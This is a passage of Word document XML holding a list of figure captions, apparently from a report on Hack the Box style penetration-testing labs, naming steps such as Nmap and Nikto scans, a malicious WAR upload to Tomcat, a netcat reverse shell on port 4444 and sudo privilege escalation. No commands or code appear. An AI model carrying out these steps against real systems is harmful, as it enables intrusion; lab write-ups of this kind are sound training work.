        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981837 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>102</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2DE79CE1" w14:textId="438C4B22"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38" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 113: Merlin List Directory [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981838 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>102</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="297A309E" w14:textId="2D5E2737"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39" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 114: User-txt [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981839 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>102</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FA7DECF" w14:textId="4A03717C"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40" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 115: Looking for Sudo Privileges [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981840 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>103</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="761B9AFD" w14:textId="14E95255"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41" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 116: Searching GTFOBins for Zip [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981841 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>103</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C15DC6A" w14:textId="146315DB"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42" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 117: Code to escalate privileges [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981842 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>104</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DB595C5" w14:textId="11CCBFFC"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43" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 118: Root Directory [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981843 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>104</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A3F5015" w14:textId="1F4A78EA"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44" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 119: The Second Flag is captured [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981844 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>104</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39EFDADE" w14:textId="26291827"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45" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 120: Hack the Box IP Address [56]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981845 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>105</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41AC5B0D" w14:textId="695FC181"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46" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 121: Nmap is run on top ports [57]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981846 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>105</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C2DEADA" w14:textId="2C26A9BC"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47" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 122: Nikto finds Username and Password [57]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981847 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>106</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58975A9A" w14:textId="5700A8CE"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48" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 123: Apache Tomcat Webserver is opened [57]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981848 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>106</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="417BA2A2" w14:textId="1ED29142"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49" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 124: Authentication Application Manager [57]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981849 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>107</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F1AEEC7" w14:textId="265CCDF3"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50" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 125: Web Application Manager Running [57]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981850 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>107</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07471E8A" w14:textId="5E6ADA6B"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51" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 126: Creation of the .WAR File</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981851 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>107</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E6B4A3B" w14:textId="6A9BC9AE"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52" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 127: Browse to upload the .WAR file [57]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981852 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>107</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="050B98D2" w14:textId="738BAF8A"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53" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 128: Start the Reverse Shell [57]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981853 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>108</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28F26C88" w14:textId="5EC76079"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54" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 129: Netcat is run on port 4444 defined in .WAR file</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981854 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>108</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="773A78BE" w14:textId="4C410576"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55" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 130: NC is successful [57]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981855 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>108</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1936FAFA" w14:textId="17BD2B79"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56" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 131: The Flags have been captured [57]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981856 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
